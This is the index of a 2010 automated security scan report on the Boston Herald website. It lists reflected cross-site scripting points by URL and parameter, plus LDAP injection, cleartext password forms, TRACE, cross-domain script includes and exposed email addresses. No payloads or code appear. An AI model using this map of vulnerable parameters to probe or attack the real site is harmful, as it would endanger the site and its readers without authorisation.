Report generated by Hoyt LLC Research at Mon Nov 08 09:39:19 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. LDAP injection

2. Cross-site scripting (reflected)

2.1. http://bostonherald.com/includes/processAds.bg [companion parameter]

2.2. http://bostonherald.com/includes/processAds.bg [companion parameter]

2.3. http://bostonherald.com/includes/processAds.bg [page parameter]

2.4. http://bostonherald.com/includes/processAds.bg [page parameter]

2.5. http://bostonherald.com/includes/processAds.bg [position parameter]

2.6. http://bostonherald.com/includes/processAds.bg [position parameter]

2.7. http://bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]

2.8. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter]

2.9. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter]

2.10. http://bostonherald.com/mediacenter/index.php [media_type_video parameter]

2.11. http://bostonherald.com/mediacenter/index.php [media_type_video parameter]

2.12. http://bostonherald.com/mediacenter/index.php [name of an arbitrarily supplied request parameter]

2.13. http://bostonherald.com/mediacenter/video.php [height parameter]

2.14. http://bostonherald.com/mediacenter/video.php [media_id parameter]

2.15. http://bostonherald.com/mediacenter/video.php [program_id parameter]

2.16. http://bostonherald.com/mediacenter/video.php [program_id parameter]

2.17. http://bostonherald.com/mediacenter/video.php [src parameter]

2.18. http://bostonherald.com/mediacenter/video.php [title parameter]

2.19. http://bostonherald.com/mediacenter/video.php [width parameter]

2.20. http://bostonherald.com/news/columnists/view.bg [format parameter]

2.21. http://bostonherald.com/news/document.bg [f parameter]

2.22. http://bostonherald.com/news/document.bg [h parameter]

2.23. http://bostonherald.com/news/regional/view.bg [format parameter]

2.24. http://bostonherald.com/search/ [topic parameter]

2.25. http://bostonherald.com/search/ [topic parameter]

2.26. http://bostonherald.com/sports/football/patriots/view.bg [format parameter]

2.27. http://bostonherald.com/sports/football/patriots/view.bg [format parameter]

3. Cleartext submission of password

3.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

3.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

3.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

3.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

3.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

3.6. http://bostonherald.com/news/columnists/view.bg

3.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

3.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

3.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

3.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

3.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

3.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

3.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

3.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

3.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

3.16. http://bostonherald.com/news/regional/view.bg

3.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

3.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

3.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

3.20. http://bostonherald.com/sports/football/patriots/view.bg

3.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

3.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

3.23. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

3.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

3.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

3.26. http://bostonherald.com/users/login

3.27. http://bostonherald.com/users/register

3.28. http://bostonherald.com/users/register/

4. Session token in URL

5. Flash cross-domain policy

6. Password field with autocomplete enabled

6.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

6.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

6.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

6.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

6.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

6.6. http://bostonherald.com/news/columnists/view.bg

6.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

6.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

6.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

6.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

6.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

6.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

6.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

6.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

6.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

6.16. http://bostonherald.com/news/regional/view.bg

6.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

6.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

6.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

6.20. http://bostonherald.com/sports/football/patriots/view.bg

6.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

6.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

6.23. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

6.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

6.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

6.26. http://bostonherald.com/users/login

6.27. http://bostonherald.com/users/register

6.28. http://bostonherald.com/users/register/

7. Cross-domain POST

7.1. http://bostonherald.com/store/

7.2. http://bostonherald.com/store/

7.3. http://bostonherald.com/store/

7.4. http://bostonherald.com/store/

7.5. http://bostonherald.com/store/

7.6. http://bostonherald.com/store/

7.7. http://bostonherald.com/store/

7.8. http://bostonherald.com/store/

7.9. http://bostonherald.com/store/

7.10. http://bostonherald.com/store/

7.11. http://bostonherald.com/store/

7.12. http://bostonherald.com/store/

7.13. http://bostonherald.com/store/

7.14. http://bostonherald.com/store/

7.15. http://bostonherald.com/store/

7.16. http://bostonherald.com/store/

7.17. http://bostonherald.com/store/

7.18. http://bostonherald.com/store/

7.19. http://bostonherald.com/store/

7.20. http://bostonherald.com/store/

8. Cross-domain Referer leakage

8.1. http://bostonherald.com/

8.2. http://bostonherald.com/blogs/entertainment/the_assistant/

8.3. http://bostonherald.com/blogs/lifestyle/fork_lift/

8.4. http://bostonherald.com/business/

8.5. http://bostonherald.com/business/general/view.bg

8.6. http://bostonherald.com/business/healthcare/

8.7. http://bostonherald.com/entertainment/

8.8. http://bostonherald.com/entertainment/arts_culture/view.bg

8.9. http://bostonherald.com/galleries/index.php

8.10. http://bostonherald.com/homepage.bg

8.11. http://bostonherald.com/includes/PointRollAds.htm

8.12. http://bostonherald.com/index.bg

8.13. http://bostonherald.com/jobfind/

8.14. http://bostonherald.com/mediacenter/index.php

8.15. http://bostonherald.com/mediacenter/video.php

8.16. http://bostonherald.com/mediacenter/video.php

8.17. http://bostonherald.com/news/

8.18. http://bostonherald.com/news/columnists/

8.19. http://bostonherald.com/news/columnists/view.bg

8.20. http://bostonherald.com/news/columnists/view.bg

8.21. http://bostonherald.com/news/document.bg

8.22. http://bostonherald.com/news/international/

8.23. http://bostonherald.com/news/international/europe/view.bg

8.24. http://bostonherald.com/news/national/

8.25. http://bostonherald.com/news/offbeat/

8.26. http://bostonherald.com/news/opinion/

8.27. http://bostonherald.com/news/opinion/editorials/view.bg

8.28. http://bostonherald.com/news/police_logs/

8.29. http://bostonherald.com/news/politics/

8.30. http://bostonherald.com/news/politics/view.bg

8.31. http://bostonherald.com/news/politics/view.bg

8.32. http://bostonherald.com/news/regional/

8.33. http://bostonherald.com/news/regional/view.bg

8.34. http://bostonherald.com/news/regional/view.bg

8.35. http://bostonherald.com/news/regional/view.bg

8.36. http://bostonherald.com/news/us_politics/

8.37. http://bostonherald.com/photobox/index.bg

8.38. http://bostonherald.com/projects/your_tax_dollars.bg

8.39. http://bostonherald.com/search/

8.40. http://bostonherald.com/search/

8.41. http://bostonherald.com/search/

8.42. http://bostonherald.com/search/

8.43. http://bostonherald.com/sports/

8.44. http://bostonherald.com/sports/baseball/red_sox/view.bg

8.45. http://bostonherald.com/sports/columnists/

8.46. http://bostonherald.com/sports/columnists/view.bg

8.47. http://bostonherald.com/sports/football/patriots/view.bg

8.48. http://bostonherald.com/sports/football/patriots/view.bg

8.49. http://bostonherald.com/sports/football/patriots/view.bg

8.50. http://bostonherald.com/track/

8.51. http://bostonherald.com/track/inside_track/view.bg

8.52. http://bostonherald.com/track/star_tracks/

8.53. http://bostonherald.com/track/star_tracks/view.bg

9. Cross-domain script include

9.1. http://bostonherald.com/

9.2. http://bostonherald.com/about/electronic_edition/

9.3. http://bostonherald.com/about/home_delivery/

9.4. http://bostonherald.com/blogs/

9.5. http://bostonherald.com/blogs/entertainment/

9.6. http://bostonherald.com/blogs/entertainment/the_assistant/

9.7. http://bostonherald.com/blogs/lifestyle/

9.8. http://bostonherald.com/blogs/lifestyle/fork_lift/

9.9. http://bostonherald.com/blogs/news/

9.10. http://bostonherald.com/blogs/news/city_desk_wired/

9.11. http://bostonherald.com/blogs/sports/

9.12. http://bostonherald.com/business/

9.13. http://bostonherald.com/business/automotive/

9.14. http://bostonherald.com/business/automotive/view/20101105chevy_volt_fact_vs_fiction/srvc=home&position=also

9.15. http://bostonherald.com/business/automotive/view/20101105value_of_gms_new_stock_difficult_to_pin_down/srvc=home&position=also

9.16. http://bostonherald.com/business/automotive/view/20101106lincoln_goes_green_with_mkz_hybrid_2011_luxury_sedan_gets_41_mpg_in_city_driving/srvc=home&position=also

9.17. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

9.18. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/srvc=home&position=also

9.19. http://bostonherald.com/business/general/

9.20. http://bostonherald.com/business/general/view.bg

9.21. http://bostonherald.com/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also

9.22. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

9.23. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=home&position=also

9.24. http://bostonherald.com/business/healthcare/

9.25. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

9.26. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5

9.27. http://bostonherald.com/business/media/

9.28. http://bostonherald.com/business/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also

9.29. http://bostonherald.com/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also

9.30. http://bostonherald.com/business/real_estate/

9.31. http://bostonherald.com/business/real_estate/view/20101106jp_starter_condo_has_charm/srvc=home&position=also

9.32. http://bostonherald.com/business/real_estate/view/20101106mansion_to_be_auctioned_site_once_owned_by_infamous_tyco_exec/srvc=home&position=also

9.33. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

9.34. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/srvc=home&position=also

9.35. http://bostonherald.com/business/real_estate/view/20101107homeowners_say_loan_mods_led_them_to_foreclosure/srvc=home&position=also

9.36. http://bostonherald.com/business/technology/

9.37. http://bostonherald.com/business/womens/

9.38. http://bostonherald.com/crossword/

9.39. http://bostonherald.com/entertainment/

9.40. http://bostonherald.com/entertainment/arts_culture/

9.41. http://bostonherald.com/entertainment/arts_culture/view.bg

9.42. http://bostonherald.com/entertainment/books/

9.43. http://bostonherald.com/entertainment/contests/

9.44. http://bostonherald.com/entertainment/fashion/

9.45. http://bostonherald.com/entertainment/food_dining/

9.46. http://bostonherald.com/entertainment/health/

9.47. http://bostonherald.com/entertainment/horoscope/

9.48. http://bostonherald.com/entertainment/lifestyle/

9.49. http://bostonherald.com/entertainment/movies/

9.50. http://bostonherald.com/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also

9.51. http://bostonherald.com/entertainment/music/

9.52. http://bostonherald.com/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also

9.53. http://bostonherald.com/entertainment/television/

9.54. http://bostonherald.com/entertainment/television/general/view/20101107dead_center_actor_lincoln_living_the_zombie_dream_on_amc_drama/srvc=home&position=7

9.55. http://bostonherald.com/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also

9.56. http://bostonherald.com/entertainment/television/general/view/20101107watch_this/srvc=home&position=also

9.57. http://bostonherald.com/entertainment/travel/

9.58. http://bostonherald.com/extras/

9.59. http://bostonherald.com/homepage.bg

9.60. http://bostonherald.com/includes/PointRollAds.htm

9.61. http://bostonherald.com/index.bg

9.62. http://bostonherald.com/intra/hashtag/

9.63. http://bostonherald.com/jobfind/

9.64. http://bostonherald.com/jobfind/news/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/srvc=home&position=also

9.65. http://bostonherald.com/jobfind/news/media/view/20101105nbc_suspends_keith_olbermann_for_political_donations/srvc=home&position=also

9.66. http://bostonherald.com/jobfind/news/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also

9.67. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

9.68. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also

9.69. http://bostonherald.com/lottery/

9.70. http://bostonherald.com/mediacenter/

9.71. http://bostonherald.com/mediacenter/index.php

9.72. http://bostonherald.com/mediacenter/index.php

9.73. http://bostonherald.com/mediacenter/video.php

9.74. http://bostonherald.com/mediacenter/video.php

9.75. http://bostonherald.com/news/

9.76. http://bostonherald.com/news/columnists/

9.77. http://bostonherald.com/news/columnists/view.bg

9.78. http://bostonherald.com/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also

9.79. http://bostonherald.com/news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/srvc=news&position=also

9.80. http://bostonherald.com/news/columnists/view/20101105kujo_its_about_time_your_luck_ran_out/srvc=news&position=also

9.81. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/

9.82. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

9.83. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=home&position=also

9.84. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

9.85. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/srvc=news&position=also

9.86. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/

9.87. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also

9.88. http://bostonherald.com/news/document.bg

9.89. http://bostonherald.com/news/international/

9.90. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

9.91. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=also

9.92. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/srvc=news&position=recent_bullet

9.93. http://bostonherald.com/news/international/asia_pacific/view/201011072_us_drone_strikes_kill_9_militants_in_nw_pakistan/srvc=news&position=also

9.94. http://bostonherald.com/news/international/asia_pacific/view/20101107indonesian_volcano_sparks_travel_chaos/srvc=news&position=also

9.95. http://bostonherald.com/news/international/europe/view.bg

9.96. http://bostonherald.com/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=home&position=recent

9.97. http://bostonherald.com/news/international/europe/view/20101107police_arrest_man_in_swedish_immigrant_shootings/srvc=news&position=also

9.98. http://bostonherald.com/news/international/europe/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=news&position=recent_bullet

9.99. http://bostonherald.com/news/national/

9.100. http://bostonherald.com/news/national/general/view/20101106blacks_struggle_with_72_percent_unwed_mothers_rate/srvc=news&position=also

9.101. http://bostonherald.com/news/national/northeast/view/20101107first_gay_episcopal_bishop_to_retire_in_2013/srvc=news&position=also

9.102. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

9.103. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also

9.104. http://bostonherald.com/news/national/southwest/view/20101107oklahoma_council_takes_no_stand_on_sharia_law_proposal/srvc=news&position=also

9.105. http://bostonherald.com/news/obituaries/

9.106. http://bostonherald.com/news/offbeat/

9.107. http://bostonherald.com/news/offbeat/view/20101103man_in_breathalyzer_costume_cited_for_dui/srvc=news&position=also

9.108. http://bostonherald.com/news/offbeat/view/20101106costly_collecting_habit_nuns_score_with_262g_baseball_card/srvc=news&position=also

9.109. http://bostonherald.com/news/offbeat/view/20101106stripper_pole_among_items_stolen_from_adult_bookstore/srvc=news&position=also

9.110. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

9.111. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/srvc=news&position=also

9.112. http://bostonherald.com/news/opinion/

9.113. http://bostonherald.com/news/opinion/editorials/view.bg

9.114. http://bostonherald.com/news/opinion/editorials/view/20101107knee-jerk_reaction/srvc=news&position=also

9.115. http://bostonherald.com/news/opinion/op_ed/view/20101107after_midterms_all_is_right/srvc=news&position=also

9.116. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

9.117. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/srvc=news&position=also

9.118. http://bostonherald.com/news/opinion/op_ed/view/20101107gop_wave_misses_liberal_enclaves/srvc=news&position=also

9.119. http://bostonherald.com/news/police_logs/

9.120. http://bostonherald.com/news/police_logs/view/20101027dont_rock_the_boat_or_break_into_it_either/srvc=news&position=also

9.121. http://bostonherald.com/news/police_logs/view/20101028david_ortiz_goes_to_bat_to_combat_hub_violence/srvc=news&position=also

9.122. http://bostonherald.com/news/police_logs/view/20101104too_much_candy_at_this_party/srvc=news&position=also

9.123. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

9.124. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/srvc=news&position=also

9.125. http://bostonherald.com/news/politics/

9.126. http://bostonherald.com/news/politics/view.bg

9.127. http://bostonherald.com/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also

9.128. http://bostonherald.com/news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/srvc=news&position=also

9.129. http://bostonherald.com/news/politics/view/20101107mass_voters_back_loosening_of_marijuana_laws/srvc=news&position=also

9.130. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

9.131. http://bostonherald.com/news/politics/view/20101107moneybags_menino/srvc=news&position=also

9.132. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

9.133. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1

9.134. http://bostonherald.com/news/regional/

9.135. http://bostonherald.com/news/regional/view.bg

9.136. http://bostonherald.com/news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/srvc=news&position=also

9.137. http://bostonherald.com/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also

9.138. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

9.139. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3

9.140. http://bostonherald.com/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=home&position=also

9.141. http://bostonherald.com/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=news&position=also

9.142. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

9.143. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2

9.144. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

9.145. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=home&position=also

9.146. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=news&position=also

9.147. http://bostonherald.com/news/us_politics/

9.148. http://bostonherald.com/news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/srvc=news&position=also

9.149. http://bostonherald.com/news/us_politics/view/20101107eric_cantor_if_nancy_pelosi__stays_then_dems_dont_get_it/srvc=news&position=also

9.150. http://bostonherald.com/news/us_politics/view/20101107georgia_details_nuclear_smuggling/srvc=news&position=also

9.151. http://bostonherald.com/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=also

9.152. http://bostonherald.com/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/srvc=news&position=recent_bullet

9.153. http://bostonherald.com/photobox/index.bg

9.154. http://bostonherald.com/projects/your_tax_dollars.bg

9.155. http://bostonherald.com/search/

9.156. http://bostonherald.com/shopping/half_price_boston/

9.157. http://bostonherald.com/sports/

9.158. http://bostonherald.com/sports/baseball/

9.159. http://bostonherald.com/sports/baseball/red_sox/view.bg

9.160. http://bostonherald.com/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also

9.161. http://bostonherald.com/sports/basketball/

9.162. http://bostonherald.com/sports/college/

9.163. http://bostonherald.com/sports/columnists/

9.164. http://bostonherald.com/sports/columnists/view.bg

9.165. http://bostonherald.com/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also

9.166. http://bostonherald.com/sports/football/

9.167. http://bostonherald.com/sports/football/other_nfl/view/20101107giants_overpower_seahawks_41-7/srvc=home&position=recent

9.168. http://bostonherald.com/sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/srvc=home&position=also

9.169. http://bostonherald.com/sports/football/patriots/view.bg

9.170. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

9.171. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0

9.172. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

9.173. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/srvc=home&position=also

9.174. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

9.175. http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/srvc=home&position=4

9.176. http://bostonherald.com/sports/golf/

9.177. http://bostonherald.com/sports/high_school/

9.178. http://bostonherald.com/sports/hockey/

9.179. http://bostonherald.com/sports/other_sports/

9.180. http://bostonherald.com/sports/soccer/

9.181. http://bostonherald.com/store/

9.182. http://bostonherald.com/track/

9.183. http://bostonherald.com/track/celebrity/

9.184. http://bostonherald.com/track/inside_track/

9.185. http://bostonherald.com/track/inside_track/view.bg

9.186. http://bostonherald.com/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also

9.187. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

9.188. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=home&position=also

9.189. http://bostonherald.com/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also

9.190. http://bostonherald.com/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also

9.191. http://bostonherald.com/track/star_tracks/

9.192. http://bostonherald.com/track/star_tracks/view.bg

9.193. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

9.194. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/srvc=home&position=6

9.195. http://bostonherald.com/track/track_gals_tv/

9.196. http://bostonherald.com/users/login

9.197. http://bostonherald.com/users/register

9.198. http://bostonherald.com/users/register/

9.199. http://bostonherald.com/weather/

10. TRACE method is enabled

11. Email addresses disclosed

11.1. http://bostonherald.com/about/home_delivery/

11.2. http://bostonherald.com/blogs/entertainment/the_assistant/

11.3. http://bostonherald.com/blogs/lifestyle/fork_lift/

11.4. http://bostonherald.com/blogs/news/city_desk_wired/

11.5. http://bostonherald.com/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also

11.6. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

11.7. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5

11.8. http://bostonherald.com/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also

11.9. http://bostonherald.com/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also

11.10. http://bostonherald.com/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also

11.11. http://bostonherald.com/mediacenter/

11.12. http://bostonherald.com/mediacenter/index.php

11.13. http://bostonherald.com/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also

11.14. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/

11.15. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also

11.16. http://bostonherald.com/news/opinion/

11.17. http://bostonherald.com/news/politics/view.bg

11.18. http://bostonherald.com/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also

11.19. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

11.20. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1

11.21. http://bostonherald.com/news/regional/view.bg

11.22. http://bostonherald.com/news/regional/view.bg

